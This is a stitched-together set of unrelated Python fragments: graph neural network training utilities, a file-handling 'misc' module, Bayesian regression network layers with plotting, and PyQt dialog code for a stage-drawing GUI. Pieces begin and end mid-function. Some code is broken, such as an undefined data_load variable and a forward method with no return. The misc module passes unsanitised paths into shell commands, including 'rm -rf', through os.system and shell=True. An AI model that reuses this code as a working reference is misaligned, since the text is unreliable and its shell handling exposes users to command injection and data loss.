torch.cuda.empty_cache()
gc.collect()
# get final test result without early stop
with torch.no_grad():
nc_logits_eval = model.nc_net(adj, features)
test_acc_final = self.eval_node_cls(nc_logits_eval[self.test_nid], labels[self.test_nid])
# log both results
self.logger.info('Final test acc with early stop: {:.4f}, without early stop: {:.4f}'
.format(test_acc, test_acc_final))
# release RAM and GPU memory
del adj, features, labels, adj_orig
torch.cuda.empty_cache()
gc.collect()
return test_acc
def log_parameters(self, all_vars):
""" log all variables in the input dict excluding the following ones """
del all_vars['self']
del all_vars['adj_matrix']
del all_vars['features']
del all_vars['labels']
del all_vars['tvt_nids']
self.logger.info(f'Parameters: {all_vars}')
@staticmethod
def eval_edge_pred(adj_pred, val_edges, edge_labels):
logits = adj_pred[val_edges.T]
logits = np.nan_to_num(logits)
roc_auc = roc_auc_score(edge_labels, logits)
ap_score = average_precision_score(edge_labels, logits)
return roc_auc, ap_score
@staticmethod
def eval_node_cls(nc_logits, labels):
""" evaluate node classification results """
if len(labels.size()) == 2:
preds = torch.round(torch.sigmoid(nc_logits))
tp = len(torch.nonzero(preds * labels))
tn = len(torch.nonzero((1-preds) * (1-labels)))
fp = len(torch.nonzero(preds * (1-labels)))
fn = len(torch.nonzero((1-preds) * labels))
pre, rec, fmeasure = 0., 0., 0.
if tp+fp > 0:
pre = tp / (tp + fp)
if tp+fn > 0:
rec = tp / (tp + fn)
if pre+rec > 0:
fmeasure = (2 * pre * rec) / (pre + rec)
else:
preds = torch.argmax(nc_logits, dim=1)
correct = torch.sum(preds == labels)
fmeasure = correct.item() / len(labels)
return fmeasure
@staticmethod
def get_lr_schedule_by_sigmoid(n_epochs, lr, warmup):
""" schedule the learning rate with the sigmoid function.
The learning rate will start with near zero and end with near lr """
factors = torch.FloatTensor(np.arange(n_epochs))
factors = ((factors / factors[-1]) * (warmup * 2)) - warmup
factors = torch.sigmoid(factors)
# range the factors to [0, 1]
factors = (factors - factors[0]) / (factors[-1] - factors[0])
lr_schedule = factors * lr
return lr_schedule
@staticmethod
def get_logger(name):
""" create a nice logger """
logger = logging.getLogger(name)
# clear handlers if they were created in other runs
if (logger.hasHandlers()):
logger.handlers.clear()
logger.setLevel(logging.DEBUG)
# create formatter
formatter = logging.Formatter('%(asctime)s - %(message)s')
# create console handler and add it to the logger
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
ch.setFormatter(formatter)
#!/usr/bin/env python
_MODULE_NAME = "misc"
_MODULE_VERSION = "v0.1.0"
_REVISION_DATE = "2019-01-10"
_AUTHORS = "<NAME> (<EMAIL>) and <NAME> (<EMAIL>)"
_DESCRIPTION = "This is a module for miscellaneous, general purpose functions."
import sys
import os
import struct
import time
import datetime
import subprocess
import hashlib
import mmap
import curses
from numpy import fromstring
###################################################################################################
def banner(SCRIPT_NAME, SCRIPT_VERSION, REVISION_DATE, AUTHORS, CONTRIBUTORS, DESCRIPTION,):
"""
Banner for python scripts.
:param SCRIPT_NAME: The name of the script
:param SCRIPT_VERSION: The version number
:param REVISION_DATE: The latest revision date
:param AUTHORS: The main authors
:param CONTRIBUTORS: Any contributing authors
:param DESCRIPTION: A brief description
:return banner_list: A nicely formatted banner
:rtype: list
"""
banner_list = []
banner_list.append("============================================================================== ")
banner_list.append(SCRIPT_NAME + " " + SCRIPT_VERSION + " (" + REVISION_DATE + ")")
banner_list.append(AUTHORS)
banner_list.append("============================================================================== ")
banner_list.append(time.ctime())
banner_list.append("")
banner_list.append(DESCRIPTION)
if CONTRIBUTORS != '':
banner_list.append("With contributions from:")
banner_list.append(CONTRIBUTORS)
banner_list.append("")
return banner_list
##################################################################################################
def format_invoked_opts(opts,commline_list=[]):
"""
Prints the invoked options to stdout and the logfile.
:param object opts: An object storing the relevant options
:param list commline_list: The entered command line arguments
:return fopts_list: A formatted list of options
:rtype: list
"""
fopts_list = []
if len(commline_list) != 0:
fopts_list.append("Invoked command line: ")
fopts_list.append(" ".join(commline_list))
fopts_list.append("")
fopts_list.append("Invoked options: ")
for key, value in opts.__dict__.items():
fopts_list.append(" " + key + ": " + str(value))
fopts_list.append("")
return fopts_list
##################################################################################################
def wc_dir(dir):
"""
Returns the number of dirs in a given dir via ls -1d | wc -l.
Note that this becomes a rather expensive function call when dir contains many subdirs.
"""
tmp_str = "ls -1d " + dir + "/*/ | wc -l"
# this is a quite new python feature and may only be available in 2.6 or so
# n = subprocess.getoutput(tmp_str)
# ... and for older python versions
return int(subprocess.Popen(tmp_str,shell=True,stdout=subprocess.PIPE).stdout.read())
##################################################################################################
def wc_all(dir):
"""
Returns the number of files and dirs in a given dir via ls -1 | wc -l.
Note that this becomes a rather expensive function call when dir contains many entries.
"""
#TODO: take care of error for empty dirs
tmp_str = "ls -1 " + dir + " | wc -l"
# this is a quite new python feature and may only be available in 2.6 or so
# n = subprocess.getoutput(tmp_str)
# ... and for older python versions
return int(subprocess.Popen(tmp_str,shell=True,stdout=subprocess.PIPE).stdout.read())
##################################################################################################
def line_count(file_namestr):
"""
Returns the number of lines in a file.
"""
if os.path.getsize(file_namestr) == 0:
return 0
with open(file_namestr) as file:
for i, l in enumerate(file):
pass
return i + 1
##################################################################################################
def mksubdir_struct(dir,max_n_entries=10000,run_always=False):
"""
This function takes the content of a dir and makes numbered substructure dirs with each n_entries of the original dir.
The motivation was to have a function that limits the number of entries in a directory to a certain threshold
(e.g., 10,000 or 30,000) in order to avoid performance issues with the OS/filesystem.
:param str dir: Path of the relevant directory
:param int max_n_entries: Max entries in a subdir
:param bool run_always: whether to run even if there are less than :param:'max_n_entries' in :param:'dir'
"""
entry_list = []
for entry in os.listdir(dir):
entry_list.append(entry)
entry_list.sort()
n_entries = len(entry_list)
if n_entries >= max_n_entries or run_always:
subdir_counter = 0
subdir_entry_counter = 0
subdir_pathstr = dir + "/%05d" %(subdir_counter)
if chk_mkdir(subdir_pathstr,True) == False:
sys.exit("Naming conflict!")
for entry in entry_list:
tmp_str = "mv " + entry + " " + subdir_pathstr + "/."
os.system(tmp_str)
subdir_entry_counter +=1
if subdir_entry_counter >= max_n_entries:
subdir_counter += 1
subdir_entry_counter = 0
subdir_pathstr = dir + "/%05d" %(subdir_counter)
if chk_mkdir(subdir_pathstr,True) == False:
sys.exit("Naming conflict!")
##################################################################################################
def chk_mkdir(dir,warning=False):
"""
This function checks whether a directory exists and if not creates it.
"""
if not os.path.isdir(dir):
tmp_str = "mkdir -p " + dir
os.system(tmp_str)
elif warning:
return False
##################################################################################################
def chk_rmdir(dir,check='any'):
"""
This function checks whether a directory exists and removes it, if it is empty.
"""
if os.path.isdir(dir):
n_dirs = 0
n_files = 0
for i in os.listdir(dir):
if os.path.isdir(dir + '/' + i):
n_dirs += 1
elif os.path.isfile(dir + '/' + i):
n_files += 1
if n_dirs == 0 and n_files == 0:
tmp_str = "rm -rf " + dir
elif n_dirs == 0 and check=='dirs':
tmp_str = "rm -rf " + dir
elif n_files == 0 and check=='files':
tmp_str = "rm -rf " + dir
else:
tmp_str = " "
os.system(tmp_str)
##################################################################################################
def chk_rmfile(file_namestr):
"""
This function checks whether a file is empty and if yes deletes it.
"""
file = open(file_namestr,'r')
test_str = file.read()
file.close()
if len(test_str) == 0:
os.remove(file_namestr)
##################################################################################################
def target_dir_struct(target_dir_path, maxitems = 10000, digits=5):
"""
This function checks whether a target dir exists and establishes/checks the subdir structure.
:param str target_dir_path: The path of the directory
:param int maxitems: The max number of items in a directory
:param int digits: The number of digits in the folder names
:return int target_subdir: The number/name of the subdir
:return int target_subdir_n: The number of items in the subdir
:return str target_subdir_pathstr: The path of the subdir
"""
# check if target_dir exists and if not create it
chk_mkdir(target_dir_path)
# establish target_dir structure
# 1) get all the present subdirs
target_subdir_list = [] # fill with all present subfolders
for i in os.listdir(target_dir_path):
if os.path.isdir(target_dir_path + '/' + i) and i not in target_subdir_list:
target_subdir_list.append(i)
# 2a) if there are no subfolders present
if len(target_subdir_list)==0:
target_subdir = 0 # this is the highest folder
target_subdir_n = 0 # this is the number of items in it
# 2b) if there are subfolders present
else:
target_subdir_list.sort()
target_subdir = int(target_subdir_list[-1]) # pick the highest folder
target_subdir_n = wc_all(target_dir_path + '/' + target_subdir_list[-1])
if target_subdir_n >= maxitems: # this limit is more important for folders rather than files (in this case tarballs); but we do it anyways
target_subdir += 1
target_subdir_n = 0
target_subdir_pathstr = target_dir_path + '/' + '{num:{fill}{width}}'.format(num=target_subdir, fill='0', width=digits)
# target_subdir_pathstr = target_dir_path + "/%05d" %(target_subdir)
chk_mkdir(target_subdir_pathstr)
return target_subdir, target_subdir_n, target_subdir_pathstr
##################################################################################################
def mv2subdir_struct(source_dir_pathstr, target_subdir, target_subdir_n, target_subdir_pathstr, maxitems = 10000):
"""
This function moves a source folder into a target subdir structure and updates it.
:param str source_dir_pathstr: The path of the dir to be moved
:param int target_subdir: The number of the target dir
:param int target_subdir_n: The number of items in the target dir
:param str target_subdir_pathstr: The path of the target dir
:param int maxitems: The max number of items in a directory
:return int target_subdir: The number of the subdir
:return int target_subdir_n: The number of items in target subdir
:return str target_subdir_pathstr: The path of the target subdir
"""
# move
tmp_str = 'mv ' + source_dir_pathstr + ' ' + target_subdir_pathstr + '/. '
os.system(tmp_str)
target_subdir_n += 1
# check if limit is reached
if target_subdir_n >= maxitems: # this limit is more important for folders rather than files (in this case tarballs); but we do it anyways
target_subdir += 1
target_subdir_n = 0
# make new target subdir
tmp_str = target_subdir_pathstr.split('/')[-1]
digits = len(tmp_str)
target_subdir_pathstr = target_subdir_pathstr[:-digits] + '{num:{fill}{width}}'.format(num=target_subdir, fill='0', width=digits)
chk_mkdir(target_subdir_pathstr)
return target_subdir, target_subdir_n, target_subdir_pathstr
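##################################################################################################
# Illustrative sketch (not part of the original module): target_dir_struct and
# mv2subdir_struct are meant to be used together -- establish the subdir
# structure once, then thread its three return values through every move.
# The archive path used here is hypothetical.
def _example_archive_dirs(source_dir_list, target_dir_path='/tmp/archive'):
    target_subdir, target_subdir_n, target_subdir_pathstr = target_dir_struct(target_dir_path)
    for source_dir_pathstr in source_dir_list:
        target_subdir, target_subdir_n, target_subdir_pathstr = mv2subdir_struct(
            source_dir_pathstr, target_subdir, target_subdir_n, target_subdir_pathstr)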
##################################################################################################
def std_datetime_str(mode='datetime'):
"""
This function gives out the formatted time as a standard string, i.e., YYYY-MM-DD hh:mm:ss.
"""
if mode == 'datetime':
return str(datetime.datetime.now())[:19]
elif mode == 'date':
return str(datetime.datetime.now())[:10]
elif mode == 'time':
return str(datetime.datetime.now())[11:19]
elif mode == 'datetime_ms':
return str(datetime.datetime.now())
elif mode == 'time_ms':
return str(datetime.datetime.now())[11:]
else:
sys.exit("Invalid mode!")
##################################################################################################
def tot_exec_time_str(time_start):
"""
This function gives out the formatted time string.
"""
time_end = time.time()
exec_time = time_end-time_start
tmp_str = "Total execution time: %0.2fs (%dh %dm %0.2fs)" %(exec_time, exec_time/3600, (exec_time%3600)/60,(exec_time%3600)%60)
return tmp_str
##################################################################################################
def intermed_exec_timing(time_start,intermed_n,total_n,n_str="n"):
"""
This function gives out the intermediate timing, speed, pace, projected remaining and end time.
"""
tmp_time = time.time()
tmp_exec_time = tmp_time-time_start
sec_per_n = 1.0*tmp_exec_time/intermed_n
n_per_hour = 3600.0/sec_per_n
proj_rest_sec = sec_per_n*(total_n-intermed_n)
proj_end_time = int(round(tmp_time + proj_rest_sec))
tmp_str = " Current speed: %0.2f " %(n_per_hour)
tmp_str += n_str + "'s/hour; current pace: %0.3f " %(sec_per_n)
tmp_str += "sec/" + n_str + "\n"
# tmp_str +="
# test the effects of being Bayesian only on the last layer
import numpy as np
from numpy import linalg as LA
import torch
from tqdm import tqdm
from tqdm import trange
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.autograd import grad
from torch.autograd import Variable
import pickle
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import os
import cProfile
import scipy
from scipy.stats import multivariate_normal
from sklearn.utils.extmath import cartesian
from copy import deepcopy
import gc
# plot the output of regression network
import torch
from torch.autograd import Variable
import matplotlib.pyplot as plt
import pickle
import os
import numpy as np
def plot_reg(model, model_type, fig_directory, title='', train_x=None, train_y=None):
# get training data
X = data_load[:,0]
Y = data_load[:,1]
X = np.float32(X)
Y = np.float32(Y)
# evaluate model on test points
N = 1000 # number of test points
x_lower = -3 #-1.5
x_upper = 3 #1.5
test_inputs = np.linspace(x_lower, x_upper, N)
# move to GPU if available
test_inputs = torch.FloatTensor(test_inputs)
test_inputs = test_inputs.cuda()
plt.figure()
# sample from the network then plot +/- 1 standard deviation range
no_samp = 100
plt.plot(X, Y, '+k')
if model_type == 'VI':
all_test_outputs = np.zeros((no_samp, N))
for i in range(no_samp):
test_outputs = model(test_inputs, no_samples = 1, shared_weights = True) # make all the datapoints in a batch use the same network weights
# convert back to np array
test_x = test_inputs.data.cpu().numpy()
all_test_outputs[i,:] = test_outputs.data.cpu().numpy()
plt.plot(test_x, all_test_outputs[i,:], linewidth=0.3)
# calculate mean and variance
mean = np.mean(all_test_outputs, 0)
variance = np.mean(all_test_outputs**2, 0) - mean**2
elif model_type == 'NeuralLinear':
mean = np.zeros(N)
variance = np.zeros(N)
for test_point in range(N):
single_mean, single_variance = model.prediction(train_x, train_y, test_inputs[test_point])
mean[test_point], variance[test_point] = single_mean.detach().cpu().numpy(), single_variance.detach().cpu().numpy()
test_x = test_inputs.data.cpu().numpy()
else:
raise ValueError('model_type must be either VI or NeuralLinear')
# variance = model.noise_variance.detach().cpu().numpy() + np.mean(all_test_outputs**2, 0) - mean**2
plt.plot(test_x, mean, color='b')
plt.fill_between(test_x, mean + 2 * np.sqrt(variance),
mean - 2 * np.sqrt(variance), color='b', alpha=0.3)
filename = 'regression_' + title + '.pdf'
filename = os.path.join(fig_directory, filename)
plt.xlabel('$x$')
plt.ylabel('$y$')
plt.ylim([-30, 30])
plt.xlim([-3, 3])
# plt.ylim([-1, 1])
# plt.xlim([-1.5, 1.5])
plt.savefig(filename)
plt.close() # get rid of this if you want to animate
# plot just the variance
plt.figure()
plt.plot(test_x, variance)
plt.xlabel('$x$')
plt.ylabel('predictive variance')
filename = 'variance_' + title + '.pdf'
filename = os.path.join(fig_directory, filename)
plt.savefig(filename)
plt.close()
# pickle for posterity
inputs = test_x
mean = mean
sd = np.sqrt(variance)
pickle_location = os.path.join(fig_directory, title)
outfile = open(pickle_location, 'wb')
pickle.dump(inputs, outfile)
pickle.dump(mean, outfile)
pickle.dump(sd, outfile)
outfile.close()
# if neural linear, plot the correlation and covariance matrices
if model_type == 'NeuralLinear':
posterior_covar = model.posterior_covar.data.cpu().numpy()
fig, ax = plt.subplots()
im = ax.imshow(np.abs(posterior_covar) , interpolation='nearest', cmap=cm.Greys_r)
filepath = os.path.join(fig_directory, 'neural_linear_covariance.pdf')
fig.savefig(filepath)
plt.close()
# plot correlation matrix using cov matrix estimate
variance_vector = np.diag(posterior_covar)
sd_vector = np.sqrt(variance_vector)
outer_prod = np.outer(sd_vector, sd_vector)
correlations = posterior_covar/outer_prod
fig, ax = plt.subplots()
im = ax.imshow(correlations , interpolation='nearest')
fig.colorbar(im)
filepath = os.path.join(fig_directory, 'neural_linear_correlation.pdf')
fig.savefig(filepath)
plt.close()
class MAP_Linear_Layer(nn.Module):
def __init__(self, n_input, n_output, omega):
super(MAP_Linear_Layer, self).__init__()
self.n_input = n_input
self.n_output = n_output
self.omega = omega
# omega is the prior standard deviation (assume isotropic prior)
prior_logvar = 2*np.log(omega)
self.prior_logvar = prior_logvar
"""initialise parameters and priors following 'Neural network ensembles and variational inference revisited', Appendix A"""
# weight parameters
self.W = nn.Parameter(torch.cuda.FloatTensor(n_input, n_output).normal_(0, 1/np.sqrt(4*n_output))) # initialisation of weight means
# bias parameters
self.b = nn.Parameter(torch.cuda.FloatTensor(n_output).normal_(0, 1e-10)) # initialisation of bias means
def forward(self, x, no_samples=None, shared_weights=None): # number of samples per forward pass
"""
input is either (batch_size x no_input), if this is the first layer of the network, or (no_samples x batch_size x no_input),
and output is (no_samples x batch_size x no_output)
"""
batch_size = x.size()[0]
# sample just one weight matrix and just one bias vector
b = self.b.expand(batch_size, -1)
samples_activations = torch.mm(x, self.W) + b
return samples_activations
def KL(self): # get L2 regularisation term
return 0
# return 0.5*(1/(self.omega**2))*(torch.sum(self.W**2) + torch.sum(self.b**2)) # assume prior means are all zero!
class MFVI_Linear_Layer(nn.Module):
def __init__(self, n_input, n_output, omega):
super(MFVI_Linear_Layer, self).__init__()
self.n_input = n_input
self.n_output = n_output
# omega is the prior standard deviation (assume isotropic prior)
prior_logvar = 2*np.log(omega)
self.prior_logvar = prior_logvar
"""initialise parameters and priors following 'Neural network ensembles and variational inference revisited', Appendix A"""
# weight parameters
self.W_mean = nn.Parameter(torch.cuda.FloatTensor(n_input, n_output).normal_(0, 1/np.sqrt(4*n_output))) # initialisation of weight means
self.W_logvar = nn.Parameter(torch.cuda.FloatTensor(n_input, n_output).normal_(-11.5, 1e-10)) # initialisation of weight logvariances
# bias parameters
self.b_mean = nn.Parameter(torch.cuda.FloatTensor(n_output).normal_(0, 1e-10)) # initialisation of bias means
self.b_logvar = nn.Parameter(torch.cuda.FloatTensor(n_output).normal_(-11.5, 1e-10)) # initialisation of bias logvariances (why uniform?)
# prior parameters
self.W_prior_mean = Variable(torch.zeros(n_input, n_output).cuda())
self.W_prior_logvar = Variable((prior_logvar*torch.ones(n_input, n_output)).cuda())
self.b_prior_mean = Variable(torch.zeros(n_output).cuda())
self.b_prior_logvar = Variable((prior_logvar*torch.ones(n_output)).cuda())
self.num_weights = n_input*n_output + n_output # number of weights and biases
def forward(self, x, no_samples, shared_weights=False): # number of samples per forward pass
"""
input is either (batch_size x no_input), if this is the first layer of the network, or (no_samples x batch_size x no_input),
and output is (no_samples x batch_size x no_output)
"""
# local reparameterisation trick
if shared_weights == True: # can't use local reparam trick if we want to sample functions from the network. assume we will only do one test sample at a time
batch_size = x.size()[0]
# sample just one weight matrix and just one bias vector
W_var = torch.exp(self.W_logvar)
b_var = torch.exp(self.b_logvar)
z_W = Variable(torch.cuda.FloatTensor(self.n_input, self.n_output).normal_(0, 1))
z_b = Variable(torch.cuda.FloatTensor(self.n_output).normal_(0, 1))
W = self.W_mean + torch.mul(torch.sqrt(W_var), z_W)
b = self.b_mean + torch.mul(torch.sqrt(b_var), z_b)
b = b.expand(batch_size, -1)
samples_activations = torch.mm(x, W) + b
else:
# find out if this is the first layer of the network. if it is, perform an expansion to no_samples
if len(x.shape) == 2:
batch_size = x.size()[0]
z = self.get_random(no_samples, batch_size)
gamma = torch.mm(x, self.W_mean) + self.b_mean.expand(batch_size, -1)
W_var = torch.exp(self.W_logvar)
b_var = torch.exp(self.b_logvar)
delta = torch.mm(x**2, W_var) + b_var.expand(batch_size, -1)
sqrt_delta = torch.sqrt(delta)
samples_gamma = gamma.expand(no_samples, -1, -1)
samples_sqrt_delta = sqrt_delta.expand(no_samples, -1, -1)
samples_activations = samples_gamma + torch.mul(samples_sqrt_delta, z)
elif len(x.shape) == 3:
batch_size = x.size()[1]
z = self.get_random(no_samples, batch_size)
# samples_gamma has different values for each sample, so has dimensions (no_samples x batch_size x no_outputs)
samples_gamma = torch.matmul(x, self.W_mean) + self.b_mean.expand(no_samples, batch_size, -1)
W_var = torch.exp(self.W_logvar)
b_var = torch.exp(self.b_logvar)
# delta has different values for each sample, so has dimensions (no_samples x batch_size x no_outputs)
delta = torch.matmul(x**2, W_var) + b_var.expand(no_samples, batch_size, -1)
samples_sqrt_delta = torch.sqrt(delta)
samples_activations = samples_gamma + torch.mul(samples_sqrt_delta, z)
return samples_activations
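# Recap of the local reparameterisation trick used in forward() above: because
# q(W) factorises per weight, the pre-activations a = xW + b are themselves
# Gaussian with
#   mean     gamma = x @ W_mean + b_mean
#   variance delta = (x**2) @ W_var + b_var
# so sampling a = gamma + sqrt(delta) * z with z ~ N(0, 1) matches sampling the
# weights directly, but with lower-variance gradients (Kingma et al., 2015).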
def get_random(self, no_samples, batch_size):
return Variable(torch.cuda.FloatTensor(no_samples, batch_size, self.n_output).normal_(0, 1)) # standard normal noise matrix
def KL(self): # get KL between q and prior for this layer
# W_KL = 0.5*(- self.W_logvar + torch.exp(self.W_logvar) + (self.W_mean)**2)
# b_KL = 0.5*(- self.b_logvar + torch.exp(self.b_logvar) + (self.b_mean)**2)
W_KL = 0.5*(self.W_prior_logvar - self.W_logvar + (torch.exp(self.W_logvar) + (self.W_mean - self.W_prior_mean)**2)/torch.exp(self.W_prior_logvar))
b_KL = 0.5*(self.b_prior_logvar - self.b_logvar + (torch.exp(self.b_logvar) + (self.b_mean - self.b_prior_mean)**2)/torch.exp(self.b_prior_logvar))
return W_KL.sum() + b_KL.sum() - 0.5*self.num_weights
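# The KL() method above evaluates, elementwise over weights and biases, the
# closed-form KL divergence between two diagonal Gaussians,
#   KL(q || p) = 0.5 * ( log(var_p / var_q) + (var_q + (mu_q - mu_p)**2) / var_p - 1 ),
# with the constant -1 terms collected into the final -0.5 * num_weights.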
class Neural_Linear_Net(nn.Module):
def __init__(self, noise_variance, hidden_sizes, omega, activation, learned_noise_var=False, input_dim=None, noise_param_init=None):
super(Neural_Linear_Net, self).__init__()
self.omega = float(omega)
self.dim_input = input_dim
self.activation = activation
self.learned_noise_var = learned_noise_var
if self.learned_noise_var:
self.noise_var_param = nn.Parameter(torch.cuda.FloatTensor([noise_param_init]))
self.noise_variance = self.get_noise_var()
else:
self.noise_variance = torch.cuda.FloatTensor([float(noise_variance)])
# create the layers in the network based on params
self.hidden_sizes = hidden_sizes
self.linears = nn.ModuleList([MAP_Linear_Layer(self.dim_input, self.hidden_sizes[0], self.omega)])
self.linears.extend([MAP_Linear_Layer(self.hidden_sizes[i], self.hidden_sizes[i+1], self.omega) for i in range(0, len(self.hidden_sizes)-1)])
self.linears.append(MAP_Linear_Layer(self.hidden_sizes[-1], 1, self.omega))
def get_noise_var(self):
if self.learned_noise_var:
return torch.exp(self.noise_var_param) # try just a log representation
else:
return self.noise_variance
def get_KL_term(self):
# calculate KL divergence between q and the prior for the entire network
KL_term = 0
for _, l in enumerate(self.linears):
KL_term = KL_term + l.KL()
return KL_term
def get_U(self, inputs, labels, trainset_size):
# calculate L2 regularised loss
self.noise_variance = self.get_noise_var()
outputs = self.forward(inputs)
no_samples = outputs.size()[0]
labels = labels.expand(no_samples, -1)
const_term = 0.5*torch.log(2*3.141592654*self.get_noise_var())
reconstruction_loss = (trainset_size)*(const_term + (1/(2*self.get_noise_var()))*torch.mean((labels - outputs)**2))
# KL_term = self.get_KL_term()
# U = (reconstruction_loss + KL_term)/trainset_size # per-datapoint ELBO
U = reconstruction_loss # try MAXIMUM LIKELIHOOD
return U
def forward(self, s, shared_weights=False):
for i, l in enumerate(self.linears):
s = l(s)
if i < len(self.linears) - 1:
s = self.activation(s)
title = "Image not parsed!", host = self)
# Check if options changed
if self._DP_optionsChangedFlag:
ret = self.unsavedQuestionDialog(message = "Reparse with changed options?", title = "Options Changed",informativeText = "The parsing options have been changed since the last parse.\n\nSave to reparse with new options\nDiscard/Cancel to go back", host = self)
if ret == QtWidgets.QMessageBox.Save:
self._DP_parsePicture()
else:
return
# Check if enough space
if not estimateOnly:
size = self.picConv.image.size # (width, height)
fx = self.stageControl.controller.stage.x + self.picConv.scale["x"] * size[0]
fy = self.stageControl.controller.stage.y + self.picConv.scale["y"] * size[1]
xlim = sorted(self.stageControl.controller.stage.xlim)
ylim = sorted(self.stageControl.controller.stage.ylim)
xcond = xlim[0] <= fx <= xlim[1]
ycond = ylim[0] <= fy <= ylim[1]
if not xcond and not ycond:
return self.criticalDialog(message = "Image too large!", informativeText = "At the current position, printing the picture will exceed stage limits in both the x and y direction\n\nStage Limits = x[{}, {}], y[{}, {}]\nImage Size = ({}, {})\nCurrent Stage Position = ({}, {})".format(*xlim, *ylim, *size, *self.stageControl.controller.stage.position), title = "Image too large!", host = self)
elif not xcond:
return self.criticalDialog(message = "Image too large!", informativeText = "At the current position, printing the picture will exceed stage limits in the x direction\n\nStage Limits = x[{}, {}]\nImage Size = ({}, {})\nCurrent Stage Position = ({}, {})".format(*xlim, *size, *self.stageControl.controller.stage.position), title = "Image too large!", host = self)
elif not ycond:
return self.criticalDialog(message = "Image too large!", informativeText = "At the current position, printing the picture will exceed stage limits in the y direction\n\nStage Limits = y[{}, {}]\nImage Size = ({}, {})\nCurrent Stage Position = ({}, {})".format(*ylim, *size, *self.stageControl.controller.stage.position), title = "Image too large!", host = self)
# / Check space
# Check the velocity
vel = self._DP_velocity.text()
try:
vel = float(vel)
except Exception as e:
return self.criticalDialog(message = "Input Error", informativeText = "Unable to parse velocity into float. (Got {})".format(vel), title = "Input Error", host = self)
if not estimateOnly:
# Alert / confirm that the user has moved to (0, 0)
# We don't bother if the user changed the filename without loading; we just let them know which image will be drawn.
ret = self.unsavedQuestionDialog(message = "Start drawing?", title = "Draw Picture",informativeText = "Using {}\n\nThis point has been taken as the (0, 0) of the image. This is usually the top left.\n\nDraw to proceed.\nCancel to go back and change stage position.".format(self._DP_filename_string), host = self, buttons = {
QtWidgets.QMessageBox.Save : "Draw"
}, noDiscard = True)
if ret != QtWidgets.QMessageBox.Save:
return
# Here we start to draw
self.setStartButtonsEnabled(False)
self._DP_picture_draw.setStyleSheet("")
self.setOperationStatus("Starting Draw Picture...")
q = ThreadWithExc(target = self._picConv_draw, args=(vel,))
q.start()
else:
td = datetime.timedelta(seconds = self.picConv.estimateTime(velocity = vel))
return self.informationDialog(message = "The picture will take approximately {}.".format(td), title = "Estimated Time", host = self)
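# A worked sketch of the bounds check performed above, with hypothetical numbers (illustrative,
# not from the original code): if stage.x = 1000, scale["x"] = 10 per pixel and the image is
# 300 px wide, then fx = 1000 + 10 * 300 = 4000, which must lie inside sorted(xlim) for the draw
# to proceed; fy is checked against ylim in the same way, and the dialogs above report whichever
# axis (or both) would be exceeded.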
def _picConv_draw(self, velocity):
try:
# Errors are supposed to be emitted directly
self.stageControl.controller.shutter.quietLog = True
self.picConv.draw(velocity = velocity)
self.stageControl.controller.shutter.quietLog = False
self.stageControl.finishTone()
except Exception as e:
self.setOperationStatus("Error Occurred. {}".format(e))
if self.devMode:
raise
else:
# If no error
self.setOperationStatus("Ready.")
finally:
# Always run
self.setStartButtonsEnabled(True)
PDIALOG_TIMEOUT = 1 # in seconds
def pDialog_setValue(self, val):
# print("SETTING VALUE: ", val)
if val == 100 or val == 50 or val == 0 or datetime.datetime.now() > self.lastPDialogUpdate + datetime.timedelta(seconds = self.PDIALOG_TIMEOUT):
self.lastPDialogUpdate = datetime.datetime.now()
self.pDialog.setValue(val)
elif val == 100:
time.sleep(self.PDIALOG_TIMEOUT)
self.pDialog_setValue(val)
def pDialog_setLabelText(self, text):
if datetime.datetime.now() > self.lastPDialogUpdate + datetime.timedelta(seconds = self.PDIALOG_TIMEOUT):
self.lastPDialogUpdate = datetime.datetime.now()
self.pDialog.setLabelText(text)
# Helper functions
def setOperationStatus(self, status, printToTerm = True, **printArgs):
self.currentStatus = status
if printToTerm:
print("[{}]".format(datetime.datetime.now().time()), status, **printArgs)
# Do some updating of the status bar
self._statusbar_label.setText(status)
def logconsole(self, status):
print("[{}]".format(datetime.datetime.now().time()), status)
EL_self_criticalDialog = QtCore.pyqtSignal('QString', 'QString', 'QString', 'bool')
def on_EL_self_criticalDialog(self, message, title = "Oh no!", informativeText = None, exitAfter = False):
ret = self.criticalDialog(message = message, title = title, informativeText = informativeText, host = self)
if exitAfter:
return os._exit(1) # For the exit to propagate upwards
else:
return ret
def criticalDialog(self, message, title = "Oh no!", informativeText = None, host = None):
_msgBox = QtWidgets.QMessageBox(host)
_msgBox.setIcon(QtWidgets.QMessageBox.Critical)
_msgBox.setWindowTitle(title)
_msgBox.setText(message)
if informativeText is not None:
_msgBox.setInformativeText(informativeText)
# Get height and width
_h = _msgBox.height()
_w = _msgBox.width()
_msgBox.setGeometry(0, 0, _w, _h)
moveToCentre(_msgBox)
# mb.setTextFormat(Qt.RichText)
# mb.setDetailedText(message)
_msgBox.setTextInteractionFlags(QtCore.Qt.TextSelectableByMouse)
self.winAudioSetMuted(True)
ret = _msgBox.exec_()
self.winAudioSetMuted(False)
return ret
def informationDialog(self, message, title = "Information", informativeText = None, host = None):
_msgBox = QtWidgets.QMessageBox(host)
_msgBox.setIcon(QtWidgets.QMessageBox.Information)
_msgBox.setWindowTitle(title)
_msgBox.setText(message)
if informativeText is not None:
_msgBox.setInformativeText(informativeText)
# Get height and width
_h = _msgBox.height()
_w = _msgBox.width()
_msgBox.setGeometry(0, 0, _w, _h)
moveToCentre(_msgBox)
# mb.setTextFormat(Qt.RichText)
# mb.setDetailedText(message)
# _msgBox.setTextInteractionFlags(QtCore.Qt.TextSelectableByMouse)
self.winAudioSetMuted(True)
ret = _msgBox.exec_()
self.winAudioSetMuted(False)
return ret
def unsavedQuestionDialog(self, message, title = "Unsaved", informativeText = None, host = None, buttons = {}, noDiscard = False):
_msgBox = QtWidgets.QMessageBox(host)
_msgBox.setIcon(QtWidgets.QMessageBox.Question)
_msgBox.setWindowTitle(title)
_msgBox.setText(message)
if informativeText is not None:
_msgBox.setInformativeText(informativeText)
if not noDiscard:
_msgBox.setStandardButtons(QtWidgets.QMessageBox.Save | QtWidgets.QMessageBox.Discard | QtWidgets.QMessageBox.Cancel)
else:
_msgBox.setStandardButtons(QtWidgets.QMessageBox.Save | QtWidgets.QMessageBox.Cancel)
_msgBox.setDefaultButton(QtWidgets.QMessageBox.Cancel)
if buttons and isinstance(buttons, dict):
for key, val in buttons.items():
_msgBox.button(key).setText(val)
# Get height and width
_h = _msgBox.height()
_w = _msgBox.width()
_msgBox.setGeometry(0, 0, _w, _h)
moveToCentre(_msgBox)
